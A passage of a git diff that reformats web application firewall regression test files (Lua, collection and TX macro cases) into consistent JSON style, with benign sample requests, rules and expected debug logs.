to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/collection-lua.json b/test/test-cases/regression/collection-lua.json index 8d8f4e129f..1c20b35f5a 100644 --- a/test/test-cases/regression/collection-lua.json +++ b/test/test-cases/regression/collection-lua.json @@ -1,292 +1,314 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set TX (1/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set TX (1/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: TX.lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: TX.lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:TX.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule TX.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set IP (2/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set IP (2/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:IP.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule IP.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set GLOBAL (3/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set GLOBAL (3/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:GLOBAL.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule GLOBAL.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set RESOURCE (4/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set RESOURCE (4/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:RESOURCE.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule RESOURCE.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set SESSION (5/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set SESSION (5/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:SESSION.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule SESSION.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set USER (6/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set USER (6/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:USER.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule USER.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.getvars ARGS (8/8)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.getvars ARGS (8/8)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?parm1=a&parm2=b", - "method":"GET", - "body": [ ] + "uri": "/whee?parm1=a&parm2=b", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-getvars-args.lua \"id:2,phase:2,deny,status:403\"" ] - } + } ] diff --git a/test/test-cases/regression/collection-regular_expression_selection.json b/test/test-cases/regression/collection-regular_expression_selection.json index 5ac6db40a2..fb438399cf 100644 --- a/test/test-cases/regression/collection-regular_expression_selection.json +++ b/test/test-cases/regression/collection-regular_expression_selection.json @@ -1,58 +1,59 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:nah with value: nops", - "error_log":"", - "http_code":200 + "expected": { + "debug_log": "Saving variable: IP:nah with value: nops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:1,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:2,phase:2,t:lowercase,setvar:IP.nah=nops\"", @@ -60,58 +61,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:id_a with value: nops", - "http_code":403 + "expected": { + "debug_log": "Saving variable: IP:id_a with value: nops", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:11,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:12,phase:2,t:lowercase,setvar:IP.id_a=nops\"", diff --git a/test/test-cases/regression/collection-resource.json b/test/test-cases/regression/collection-resource.json index b73d00cb14..c89ba570c8 100644 --- a/test/test-cases/regression/collection-resource.json +++ b/test/test-cases/regression/collection-resource.json @@ -1,49 +1,52 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,setvar:resource.test=123,id:900000\"", @@ -52,50 +55,53 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - "audit_log":"", - "debug_log":"RESOURCE:whee::webappid::test", - "error_log":"" + "expected": { + "debug_log": "RESOURCE:whee::webappid::test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecWebAppId webappid", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", diff --git a/test/test-cases/regression/collection-tx-with-macro.json b/test/test-cases/regression/collection-tx-with-macro.json index a0173b6bb6..7ceafcbe8f 100644 --- a/test/test-cases/regression/collection-tx-with-macro.json +++ b/test/test-cases/regression/collection-tx-with-macro.json @@ -1,173 +1,179 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": 